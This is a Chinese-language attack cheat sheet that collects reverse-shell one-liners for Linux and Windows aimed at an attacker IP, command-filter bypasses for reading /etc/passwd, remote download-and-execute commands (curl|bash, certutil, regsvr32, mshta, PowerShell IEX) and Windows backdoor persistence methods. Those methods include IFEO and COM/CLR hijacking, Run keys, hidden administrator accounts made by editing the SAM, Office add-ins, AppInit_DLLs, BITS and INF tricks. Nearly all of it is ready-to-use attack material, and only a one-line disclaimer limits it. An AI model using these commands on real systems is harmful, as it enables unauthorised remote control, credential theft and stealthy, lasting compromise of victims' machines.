从shell到持久化后门

反弹shell的各种姿势

攻击者主机为:192.168.99.242,本地监听1234端口

Linux 反弹shell

姿势一:bash反弹

bash -i >& /dev/tcp/192.168.99.242/1234 0>&1

#base64版
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html

其他版本:

exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done
exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0

姿势二:nc反弹

nc -e /bin/bash 192.168.99.242 1234

姿势三:awk反弹

awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getlinec;close(c))while(c|getline)print|&s;close(s)}'

姿势四:telnet反弹

备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果。

telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321

姿势五:socat反弹

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234

姿势六:Python反弹

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.99.242',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

姿势七:PHP反弹

php -r '$sock=fsockopen("192.168.99.242",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

姿势八:Perl反弹

perl -e 'use Socket;$i="192.168.99.242";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

姿势九:Ruby反弹

ruby -rsocket -e'f=TCPSocket.open("192.168.99.242",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

姿势十:Lua反弹

lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.99.242','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

姿势十一:JAVA反弹

public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

保存为Revs.java文件,编译执行,成功反弹shell。

javac Revs.java 
java Revs

Windows反弹shell

姿势一:nc反弹

netcat 下载:https://eternallybored.org/misc/netcat/
服务端反弹:nc 192.168.99.242 1234 -e c:\windows\system32\cmd.exe

姿势二:powershell反弹

powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。

PS C:\WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.99.242 -p 1234 -e cmd

下载到目标机器本地执行:

PS C:\WWW> Import-Module ./powercat.ps1
PS C:\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd

姿势三:MSF反弹shell

使用msfvenom生成相关Payload

msfvenom -l payloads | grep 'cmd/windows/reverse'msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.99.242 LPORT=1234

姿势四:Cobalt strike反弹shell

1、配置监听器:点击Cobalt Strike——>Listeners——>在下方Tab菜单Listeners,点击add。
2、生成payload:点击Attacks——>Packages——>Windows Executable,保存文件位置。
3、目标机执行powershell payload

姿势五:Empire反弹shell

usestager windows/launcher_vbs
info
set Listener test
execute

姿势六:nishang反弹shell

Reverse TCP shell:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com /samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.1.1.210 -port 1234

Reverse UDP shell:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 10.1.1.210 -port 1234

姿势七:Dnscat反弹shell

github项目地址:
https://github.com/iagox86/dnscat2
服务端:
ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open -e open 
目标主机:
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx

命令执行绕过

‘ (单引号)以及 \ (反斜杠)绕过

n54

?、*、[、]、^、- 通配符绕过

问号最好只匹配到唯一一条。

$ /b??/c?t /e?c/??ss?d  #/bin/cat /etc/passwd
$ /???/nc? -e /???/b??h 2130706433 6666 #/bin/nc -e /bin/bash 127.0.0.1 6666

$u 不存在的符号

$ cat $u/etc$u/passwd%u

; 分号执行

$ cat /etc/passwd;ls

n55

通过命令下载执行恶意代码的几种姿势

在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。

Linux 远程恶意代码执行

curl

以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。

方式1:curl -fsSL http://192.168.99.19:8080/test.sh | bash
方式2:bash < <( curl http://192.168.99.19:8080/test.sh  )

wget

执行wget命令远程下载恶意程序

方式1:wget -q -O- http://192.168.99.19:8080/test.sh | bash
方式2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php

url+wget合并,实现无文件远程恶意代码执行

bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh||wget -q -O- http://192.168.99.19:8080/test.sh)|bash -sh >/dev/null 2>&1&'

rcp

rcp命令用于复制远程文件或目录

rcp root@x.x.x.x:./testfile testfile

scp

scp 是 rcp 的加强版,scp 是加密的,rcp 是不加密的

scp username@servername:/path/filename /tmp/local_destination

rsync

使用rsync可以进行远程同步,拉取文件到本地服务器

rsync -av x.x.x.x:/tmp/passwd.txt  /tmp/passwd.txt

sftp

使用sftp下载远程服务器上的文件

sftp admin@192.168.99.242 <<EOF  
get  /tmp/2.txt            
quit 
EOF

Windows 远程恶意代码执行

Powershell

利用powershell远程执行ps1脚本

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))"

Bitsadmin

利用bitsadmin命令下载文件到目标机器

bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt

certutil

用于备份证书服务,一般建议下载完文件后对缓存进行删除

#下载文件
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php
#删除缓存
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete

rundll32

使用rundll32.exe,可以通过mshtml.dll执行JavaScript ,依赖于WScript.shell这个组件

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

regsvr32

远程加载执行,解析.src文件

regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll

wmic

执行WMIC以下命令从远程服务器下载并运行恶意XSL文件

wmic os get /FORMAT:"http://192.168.28.128/evil.xsl"

msiexec

用于安装Windows Installer安装包,可远程执行msi文件

msiexec /q /i http://192.168.28.128/evil.msi

IEExec

IEexec.exe应用程序是.NET Framework附带程序,运行IEExec.exe并使用url启动其他程序

crosoft.NET\Framework64\v2.0.50727>caspol.exe -s off
C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe

mshta

mshta用于执行.hta文件

mshta http://192.168.28.128/run.hta

msxsl

msxsl.exe是微软用于命令行下处理XSL的一个程序

msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts/exec.xsl

pubprn.vbs

在Windows 7以上版本存在一个名为pubprn.vbs的微软已签名WSH脚本,可以利用来解析.sct脚本

"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

windows中常见后门持久化姿势

映像劫持

这个和shift后门差不多,只不过在低版本的windows中,我们可以简单地替换程序,但是在高版本的windows版本中替换的文件受到了系统的保护,所以这里我们要使用另外一个知识点:映像劫持。

“映像劫持”,也被称为”IFEO”(Image File Execution Options)

就是Image File Execution Options(其实应该称为"image Hijack"。)是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和local system有权读写修改。
PS:来自百度百科

简单来说就是当目标程序被映像劫持时,当我们启动目标程序时,启动的是劫持后的程序而不是原来的程序

操作也很简单,在注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option下添加一个项sethc.exe,然后在sethc.exe这个项中添加debugger键,键值为我们恶意程序的路径,如下图

n1

效果如下

n2

注册表自启动项

MSFPersistence模块利用的就是写注册表自启动项来实现的,一般自启动项是这两个键:RunRunOnce,两者的区别如下

  1. Run:该项下的键值即为开机启动项,每一次随着开机而启动。
  2. RunOnce:RunOnce和Run差不多,唯一的区别就是RunOnce的键值只作用一次,执行完毕后就会自动删除

常见注册表启动项键的位置:

用户级

\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

系统级

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce

修改一下:

n3

执行结果:

n4

定时任务

windows下定时任务的命令有两个分别是:atschtasks,他们两者主要区别是at命令在win708等高版本的windows中是不能将任务在前台执行的,也就是只会打开一个后台进程,而schtasks是将定时的任务在前台执行,下面我们逐个看看

at的一些参数

AT [\\computername] time [/INTERACTIVE]
    [ /EVERY:date[,...] | /NEXT:date[,...]] "command"

at的执行如下:

n5

schtasks一些参数:

schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]] /?

schtasks的执行如下:

n6

用户登陆初始化

Userinit的作用是用户在进行登陆初始化设置时,WinLogon进程会执行指定的login scripts,所以我们可以修改它的键值来添加我们要执行的程序

注册表路径为:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit,我们添加一个我们启动的程序,多个程序用逗号隔开

n7

效果如下:

n8

Logon Scripts

Logon Scripts优先于av先执行,我们可以利用这一点来绕过av的敏感操作拦截

注册表路径为:HKEY_CURRENT_USER\Environment,创建一个键为:UserInitMprLogonScript,其键值为我们要启动的程序路径

n9

效果如下:
n10

Logon Scripts

Logon Scripts优先于av先执行,我们可以利用这一点来绕过av的敏感操作拦截

注册表路径为:HKEY_CURRENT_USER\Environment,创建一个键为:UserInitMprLogonScript,其键值为我们要启动的程序路径

n11

效果如下:
n12

屏幕保护程序

在对方开启屏幕保护的情况下,我们可以修改屏保程序为我们的恶意程序从而达到后门持久化的目的
其中屏幕保护的配置存储在注册表中,其位置为:HKEY_CURRENT_USER\Control Panel\Desktop,关键键值如下:

  1. SCRNSAVE.EXE - 默认屏幕保护程序,我们可以把这个键值改为我们的恶意程序
  2. ScreenSaveActive - 1表示屏幕保护是启动状态,0表示表示屏幕保护是关闭状态
  3. ScreenSaverTimeout - 指定屏幕保护程序启动前系统的空闲事件,单位为秒,默认为900(15分钟)

设置如下:
n13

效果图:

n14

自启动服务

自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将exe文件注册为服务,也可以将dll文件注册为服务

为了方便起见我们可以直接用Metasploit来注册一个服务

meterpreter > run metsvc -A

n15

运行之后msf会在%TMP%目录下创建一个随机名称的文件夹,然后在该文件夹里面生成三个文件:metsvc.dllmetsvc-server.exemetsvc.exe

n16

同时会新建一个服务,其显示名称为Meterpreter,服务名称为metsvc,启动类型为”自动”,默认绑定在31337端口。

n17

n18

如果想删除服务,可以执行

meterpreter > run metsvc -r

影子用户

影子用户顾名思义就是一个隐藏用户,只能通过注册表查看这个用户,其它方式是找不到这个用户的信息的

在用户名后面加一个$可以创建一个匿名用户,创建完毕后我们再把这个用户添加到administrator组

net user test$ test /add
net localgroup administrators test$ /add

可以看到net user是看不到我们创建的用户,但是计算机管理-用户和组中可以看到

n19

所以这时候我们就需要修改一下注册表,其键位置为:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

注意:SAM键值默认是只能system权限修改的,所以我们要修改一下SAM键的权限,给予administrator完全控制和读取的权限

n20

然后我们将administrator用户对应的项中的F值复制到test$对应xiang中的F值,然后保存

n21

然后我们将test$删除掉

net user test$ /del

然后再双击导出的注册表文件,然后我们再看一下

n22

net user和计算机管理-用户和组中都查看不到用户了,但是我们可以用net user test$查看用户信息

这个时候我们再用net user test$ /del是删除不掉这个用户的,只能通过注册表来删除。

waitfor

关于waitfor手册中是这么解释的:

在系统上发送或等待信号。waitfor可用于跨网络同步计算机。

waitfor的语法

waitfor [/s <Computer> [/u [<Domain>\]<User> [/p [<Password>]]]] /si <SignalName>
waitfor [/t <Timeout>] <SignalName>

参数解释:

/s <Computer>  指定远程计算机的名称或IP地址,默认为本地计算机
/u [<Domain>]<user>    使用指定用户帐户的凭据运行脚本。默认是使用当前用户的凭据。
/p <Password>  指定/u参数中指定的用户帐户的密码。
/si            发送指定激活信号。
/t             指定等待信号的秒数。默认为无限期等待。
<SignalName>    指定等待或发送的信号,不区分大小写,长度不能超过225个字符

关于waitfor更多的信息可以看一下微软提供的手册:链接

我们来测试一下看看

waitfor test && calc 表示接收信号成功后执行计算器

waitfor /s 192.168.163.143 /u qiyou /p qiyou /si test

结果如下
n23

但是这样只能执行一次,这对我们后门持久化很不利,所以我们得想办法让它持久化。

这里就要借用一下三好师傅的powershell脚本:链接,三好师傅的分析:链接

执行效果如下:

n24

该方法的优点就是能主动激活,但是缺点也明显就是只能在同一网段才能接收和发送激活信号、服务器重启之后就不行了。

CLR

CLR的简述(来自百度百科)

CLR(公共语言运行库,Common Language Runtime)和Java虚拟机一样也是一个运行时环境,是一个可由多种编程语言使用的运行环境。CLR的核心功能包括:内存管理、程序集加载、安全性、异常处理和线程同步,可由面向CLR的所有语言使用。并保证应用和底层操作系统之间必要的分离。CLR是.NET Framework的主要执行引擎。

需要注意的是CLR能够劫持系统中全部.net程序,而且系统默认会调用.net程序,从而导致我们的后门自动触发,这是我们后门持久化的一个好的思路,下面来实现一下

修改一下注册表,注册表路径:HKEY_CURRENT_USER\Software\Classes\CLSID\,新建子项{11111111-1111-1111-1111-111111111111}(名字随便,只要不与注册表中存在的名称冲突就行),然后再新建子项InProcServer32,新建一个键ThreadingModel,键值为:Apartment,默认的键值为我们dll的路径

n25

然后在cmd下设置一下:
PS:要注册为全局变量,不然只能在当前cmd窗口劫持.net程序

SETX COR_ENABLE_PROFILING=1 /M
SETX COR_PROFILER={11111111-1111-1111-1111-111111111111} /M

然后执行一波,效果如下,可以看到已经成功劫持了
n26

Hijack CAccPropServicesClass and MMDeviceEnumerator

什么是COM(来自WIKI

组件对象模型(英语:Component Object Model,缩写COM)是微软的一套软件组件的二进制接口标准。这使得跨编程语言的进程间通信、动态对象创建成为可能。COM是多项微软技术与框架的基础,包括OLE、OLE自动化、ActiveX、COM+、DCOM、Windows shell、DirectX、Windows Runtime。

这个和CRL劫持.NET程序类似,也是通过修改CLSID下的注册表键值,实现对CAccPropServicesClassMMDeviceEnumerator的劫持,而系统很多正常程序启动时需要调用这两个实例,所以这个很适合我们的后门持久化。

经测试貌似64位系统下不行(或许是我姿势的问题),但是32位系统下可以,下面说一下32位系统利用方法:

%APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\下放入我们的后门dll,重命名为test._dl

PS:如果Installer文件夹不存在,则依次创建Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}

640

然后就是修改注册表了,在注册表位置为:HKCU\Software\Classes\CLSID\下创建项{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7},然后再创建一个子项InprocServer32,默认为我们的dll文件路径:C:\Users\qiyou\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E},再创建一个键ThreadingModel,其键值为:Apartment

n27

然后就是测试了,打开iexplore.exe,成功弹框

n28

PS:{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}对应CAccPropServicesClass{BCDE0395-E52F-467C-8E3D-C4579291692E}对应MMDeviceEnumerator

劫持MruPidlList

在注册表位置为HKCU\Software\Classes\CLSID\下创建项{42aedc87-2188-41fd-b9a3-0c966feabec1},再创建一个子项InprocServer32,默认的键值为我们的dll路径,再创建一个键ThreadingModel,其键值:Apartment

n29

该注册表对应COM对象MruPidlList,作用于shell32.dll,而shell32.dll是Windows的32位外壳动态链接库文件,用于打开网页和文件,建立文件时的默认文件名的设置等大量功能。其中explorer.exe会调用shell32.dll,然后会加载COM对象MruPidlList,从而触发我们的dll文件

n30

当用户重启时或者重新创建一个explorer.exe进程时,就会加载我们的恶意dll文件,从而达到后门持久化的效果。这里我们直接结束一个explorer.exe进程再起一个进程来看一下效果

n31

office系列

Word WLL

把dll文件保存在%APPDATA%\Microsoft\Word\Startup,然后把后缀名改为wll
PS:Startup支持启动多个wll

打开word,成功弹框
n32

Excel XLL

Excel dll的编写可以参考三好师傅这个项目:链接
用三好师傅powershell脚本生成现成的Excel dll:链接

将生成的DLL文件复制到%appdata%\Microsoft\AddIns目录下,然后再修改一下注册表,office版本对应的注册表位置如下:

office2003 — HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\
office2007 — HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\
office2010 — HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\
office2013 — HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\
office2016 — HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\

我这里使用的2010的,所以我们要修改的是HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options,添加一个键OPEN,键值为:/R test.dll

n33

然后打开Excel,发现成功弹出计算器

n34

PowerPoint VBA add-ins

用三好师傅powershell脚本生成现成的PowerPoint dll:链接

将生成的DLL文件复制到%appdata%\Microsoft\AddIns目录下,然后参考前面我给出的office版本对应的注册表位置,在HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint下新建一个子项:AddIns,然后在AddIns下面新建一个子项test,新建一个键为Autoload,类型为DWORD,键值为:1;新建一个键为Path,类型为SZ,键值为我们dll文件的路径

n35

打开PowerPoint成功弹出计算器

n36

文件关联

什么是文件关联

文件关联就是将一种类型的文件与一个可以打开它的程序建立起一种依存关系。一个文件可以与多个应用程序发生关联。可以利用文件的“打开方式”进行关联选择。
举个例子来说,位图文件(BMP文件)在Windows中的默认关联程序是“图片”,如果将其默认关联改为用ACDSee程序来打开,那么ACDSee就成了它的默认关联程序。
PS:来自百度百科

我们可以用assoc命令显示或修改文件扩展名关联,我们可以看一下.txt文件的关联

n37

我们可以用ftype命令显示或修改用在文件扩展名关联中的文件类型

n38

相关注册表

HKEY_CURRENT_USER\Software\Classe    //保存了当前用户的类注册和文件扩展名信息
HKEY_LOCAL_MACHINE\Software\Classe   //保存了系统所有用户用户的类注册和文件扩展名信息
HKEY_CLASS_ROOT                      //HKEY_CLASSES_ROOT项提供合并来自上面两个的信息的注册表的视图

我们以.txt为例,通过文件关联来修改它默认打开的程序。
修改\HKEY_CLASS_ROOT\txtfile\shell\open\command的默认值为我们要执行的程序

n39

效果如下:

n40

AppInit_DLLs

User32.dll被加载到进程时,会读取AppInit_DLLs注册表项,如果有值,调用LoadLibrary() api加载用户dll。

其注册表位置为:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs,把AppInit_DLLs的键值设置为我们dll路径,将LoadAppInit_DLLs设置为1

n41

效果如下:

n42

Netsh helper

netsh(全称:Network Shell) 是windows系统本身提供的功能强大的网络配置命令行工具,它可以添加自定的dll从而拓展其功能,我们可以使用netsh add helper yourdll.dll来添加拓展功能,添加了之后,在启动netsh的时候就会加载我们dll文件

添加自定义helper dll
关于helper dll的编写可以参考这个项目:链接

我们可以使用两种方式来添加helper:

  1. 通过cmd添加helper

    netsh add helper test.dll

    n43

  2. 通过注册表添加helper
    其位置为:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh,创建一个键,名称随便,键值为我们dll的路径

n44

效果如下:
n45

利用BITS

BITS (后台智能传送服务) 是一个 Windows 组件,它可以在前台或后台异步传输文件,为保证其他网络应用程序获得响应而调整传输速度,并在重新启动计算机或重新建立网络连接之后自动恢复文件传输。

bitsadmin是一个命令行工具,用于创建下载或上传任务并监视其进度。你可以执行bitsadmin /?bitsadmin /HELP获取帮助列表。

常见的bitsadmin命令

bitsadmin /create [type] DisplayName //创建一个任务
bitsadmin /cancel <Job> //删除一个任务
bitsadmin /list /allusers /verbose //列出所有任务
bitsadmin /AddFile <Job> <RemoteURL> <LocalName> //给任务test添加一个下载文件
bitsadmin /SetNotifyCmdLine <Job> <ProgramName> [ProgramParameters] //设置在任务完成传输时或任务进入状态时将运行的命令行命令。
bitsadmin /Resume <Job> //激活传输队列中的新任务或挂起的任务。
bitsadmin /cancel <Job> //删除某个任务
bitsadmin /reset /allusers //删除所有任务
bitsadmin /complete <Job> //完成某个任务

下面我们来测试一下:

bitsadmin /create test
bitsadmin /addfile test c:\windows\system32\calc.exe c:\Users\qiyou\Desktop\calc.exe //为了方便起见我们直接复制本地文件
bitsadmin /SetNotifyCmdLine test cmd.exe "cmd.exe /c calc.exe"
bitsadmin /resume test

效果如下:
n46

重启电脑之后任务还是存在

n47

重启电脑之后任务会再一次被激活,大概几分钟之后我们的命令会再次执行(由于时间太长了就不录制gif了)

n48

如果我们想让任务完成,可以执行bitsadmin /complete testcalc.exe也会复制到桌面上

n49

利用inf文件实现后门

inf文件

INF文件或安装信息文件是Microsoft Windows用于安装软件和驱动程序的纯文本文件。INF文件最常用于安装硬件组件的设备驱动程序。Windows包含用于创建基于INF的安装的IExpress工具。INF文件是Windows安装程序API及其后续版本Windows Installer的一部分。
PS:来自WIKI
inf`文件的结构
想了解更多可以看一下微软的手册:`https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc939869(v=technet.10)#information-inf-file-entries
1. DefaultInstall节(来自WIKI)
INF文件的结构与INI文件的结构非常类似; 它包含用于指定要复制的文件,对注册表的更改等的各个部分。所有INF文件都包含一个[Version]带有Signature 键值对的部分,用于指定INF文件所针对的Windows版本。签名通常是$CHICAGO$(对于Windows 9x)或$WINDOWS NT$(对于Windows NT / 2K / XP)。其余大多数部分是用户定义的,并且包含特定于要安装的组件的信息。

2. DefaultInstall节(来自微软的手册)
    RunPreSetupCommands-本节中指定的命令在安装服务配置文件之前运行。
    RunPostSetupCommands-本节中指定的命令在安装程序完成服务配置文件后运行。
    RunPreUnInstCommands-本节中指定的命令在卸载程序开始之前运行。
    RunPostUnInstCommands-本节中指定的命令在卸载程序运行后运行。

下面举一个calc.inf弹计算器的例子

[Version]
Signature="$CHICAGO$"
AdvancedINF=2.5,"test"
[DefaultInstall]
RunPreSetupCommands=Command1
[Command1]
C:\windows\system32\calc.exe

命令行下执行:

rundll32.exe advpack.dll,LaunchINFSection calc.inf,DefaultInstall

效果如下:
n50

后门实现:
在注册表HKEY_CURRENT_USER\Software\Microsoft\处依次新建子项\IEAK\GroupPolicy\PendingGPOs,然后再新建几个键,如下:

  1. 键:Count,类型:REG_DWORD,键值:1
  2. 键:Path1,类型:REG_SZ,键值:C:\Users\Administrator\Desktop\test\calc.inf //这个为我们inf文件的路径,这里以上面那个inf文件例子为例
  3. 键:Section1,类型:REG_SZ,键值:DefaultInstall

如下图所示:
n51

重启电脑之后成功弹出计算器

n52

但是重启之后PendingGPOs该项就会被清除,需要我们重新修改注册表

n53

仅供学习参考,请勿用于非法用途!

参考